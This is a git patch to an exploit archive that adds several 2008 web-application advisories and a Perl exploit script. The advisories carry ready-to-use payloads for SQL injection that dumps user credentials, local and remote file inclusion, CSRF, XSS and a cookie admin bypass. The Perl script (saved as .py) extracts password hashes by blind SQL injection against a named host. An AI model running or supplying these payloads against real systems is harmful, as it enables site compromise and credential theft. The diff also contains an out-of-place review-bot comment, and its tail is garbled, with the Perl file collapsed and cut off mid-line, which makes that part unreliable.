From 681c155d4f3f6fff395872754bf1dfaca06f5411 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 17 Feb 2014 04:27:42 +0000
Subject: [PATCH] Updated 02_17_2014
---
 files.csv | 8 +++
 platforms/multiple/webapps/31673.txt | 9 ++++
 platforms/php/webapps/31674.txt | 11 ++++
 platforms/php/webapps/31675.txt | 10 ++++
 platforms/php/webapps/31676.txt | 7 +++
 platforms/php/webapps/31677.txt | 11 ++++
 platforms/php/webapps/31679.txt | 10 ++++
 platforms/php/webapps/31681.py | 78 ++++++++++++++++++++++++++++
 platforms/php/webapps/31682.txt | 11 ++++
 9 files changed, 155 insertions(+)
 create mode 100755 platforms/multiple/webapps/31673.txt
 create mode 100755 platforms/php/webapps/31674.txt
 create mode 100755 platforms/php/webapps/31675.txt
 create mode 100755 platforms/php/webapps/31676.txt
 create mode 100755 platforms/php/webapps/31677.txt
 create mode 100755 platforms/php/webapps/31679.txt
 create mode 100755 platforms/php/webapps/31681.py
 create mode 100755 platforms/php/webapps/31682.txt
diff --git a/files.csv b/files.csv
index 7410c5d88..1d974c5db 100755
--- a/files.csv
+++ b/files.csv
@@ -28453,3 +28453,11 @@ id,file,description,date,author,platform,type,port
 31670,platforms/php/webapps/31670.txt,"WordPress <= 2.3.3 'cat' Parameter Directory Traversal Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
 31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 admin.php Administrator Account Creation CSRF",2008-04-18,"Michael Brooks",php,webapps,0
 31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 beta 2 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,php,webapps,0
+31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,multiple,webapps,0
+31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 'detail.php' SQL Injection Vulnerability",2008-04-19,S@BUN,php,webapps,0
+31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 Multiple Local File Include Vulnerabilities",2008-04-19,KnocKout,php,webapps,0
+31676,platforms/php/webapps/31676.txt,"Host Directory PRO Cookie Security Bypass Vulnerability",2008-04-20,Crackers_Child,php,webapps,0
+31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 'beg' Parameter Cross Site Scripting Vulnerability",2008-04-21,ZoRLu,php,webapps,0
+31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 'mod_search' Remote File Include Vulnerability",2008-04-21,ZoRLu,php,webapps,0
+31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module 'article.php' SQL Injection Vulnerability",2008-04-21,Cr@zy_King,php,webapps,0
+31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0
diff --git a/platforms/multiple/webapps/31673.txt b/platforms/multiple/webapps/31673.txt
new file mode 100755
index 000000000..abefe7c0d
--- /dev/null
+++ b/platforms/multiple/webapps/31673.txt
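Review bot: The new row for 31681 records the path as `platforms/php/webapps/31681.py`, but the file this commit adds under that name is Perl (`use IO::Socket;`, `$server = $ARGV[0];`), so the catalogue's extension does not match the content. Anything that picks an interpreter, syntax highlighter or scanning rule from the extension will mis-handle this entry. I would rename the file and change the row to start `31681,platforms/php/webapps/31681.pl,`. That file also opens with uncommented advisory prose (`source: ...`), so those header lines would need a leading `#` for it to parse as a script at all. Separately, every new `.txt` advisory is created with mode 100755; 100644 looks like the intended mode for non-executable text.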
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28848/info
+
+Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability.
+
+Successful exploits aid in transferring malicious content to unsuspecting users' computers, aiding in further attacks. Other actions may also be affected, but this has not been confirmed.
+
+Azureus HTML WebUI 0.7.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent
\ No newline at end of file
diff --git a/platforms/php/webapps/31674.txt b/platforms/php/webapps/31674.txt
new file mode 100755
index 000000000..37917d2d5
--- /dev/null
+++ b/platforms/php/webapps/31674.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28859/info
+
+XOOPS Recette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Recette 2.2 is vulnerable to this issue; other versions may also be affected.
+
+http://www.example.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
+
+
diff --git a/platforms/php/webapps/31675.txt b/platforms/php/webapps/31675.txt
new file mode 100755
index 000000000..53f9f5769
--- /dev/null
+++ b/platforms/php/webapps/31675.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28861/info
+
+Aterr is prone to local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
+
+The issues affect Aterr 0.9.1; other versions might also be affected.
+
+http://www.example.com/path/include/functions.inc.php?class=[Local File]
+http://www.example.com/path/include/common.inc.php?file=[Local File]
\ No newline at end of file
diff --git a/platforms/php/webapps/31676.txt b/platforms/php/webapps/31676.txt
new file mode 100755
index 000000000..050a66000
--- /dev/null
+++ b/platforms/php/webapps/31676.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28863/info
+
+Host Directory PRO is prone to a security-bypass vulnerability because it fails to properly validate user credentials before performing certain actions.
+
+Exploiting this issue may allow an attacker to bypass certain security restrictions and gain administrative access to the application. This will compromise the application and may aid in further attacks.
+
+javascript:document.cookie = "adm=1 path=/;";
\ No newline at end of file
diff --git a/platforms/php/webapps/31677.txt b/platforms/php/webapps/31677.txt
new file mode 100755
index 000000000..ea639605a
--- /dev/null
+++ b/platforms/php/webapps/31677.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28865/info
+
+Advanced Electron Forum (AEF) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Advanced Electron Forum (AEF) 1.0.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?act=members&sortby=1&order=1&beg=[XSS]
+
+
diff --git a/platforms/php/webapps/31679.txt b/platforms/php/webapps/31679.txt
new file mode 100755
index 000000000..9ff68b275
--- /dev/null
+++ b/platforms/php/webapps/31679.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28867/info
+
+PortailPHP is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying computer; other attacks are also possible.
+
+PortailPHP 2.0 is vulnerable; other versions may also be vulnerable.
+
+
+http://www.example.com/portailphp_path/mod_search/index.php?chemin=ZoRlu.txt
\ No newline at end of file
diff --git a/platforms/php/webapps/31681.py b/platforms/php/webapps/31681.py
new file mode 100755
index 000000000..a4b517b5f
--- /dev/null
+++ b/platforms/php/webapps/31681.py
@@ -0,0 +1,78 @@ +source: http://www.securityfocus.com/bid/28879/info + + +XOOPS Article module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +# Exploit : + +############################################# + +#Coded By Cr@zy_King http://coderx.org]# + +############################################# + +use IO::Socket; + +if (@ARGV != 3) + +{ + +print "\n-----------------------------------\n"; + +print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n"; + +print "-----------------------------------\n"; + +print "\n4ever Cra\n"; + +print "crazy_kinq[at]hotmail.co.uk\n"; + +print "http://coderx.org\n"; + +print "\n-----------------------------------\n"; + +print "\nKullanim: $0 \n"; + +print "Ornek: $0 www.victim.com /path 1\n"; + +print "\n-----------------------------------\n"; + +exit (); + +} + +$server = $ARGV[0]; + +$path = $ARGV[1]; + +$uid = $ARGV[2]; + +$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => + +"80"); + +printf $socket ("GET + +%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NUL +L,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, +NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: + +close\n\n", + +$path,$server,$uid); + +while(<$socket>) + +{ + +if (/\>(\w{32})\' http://someblog.com/ \ No newline at end of file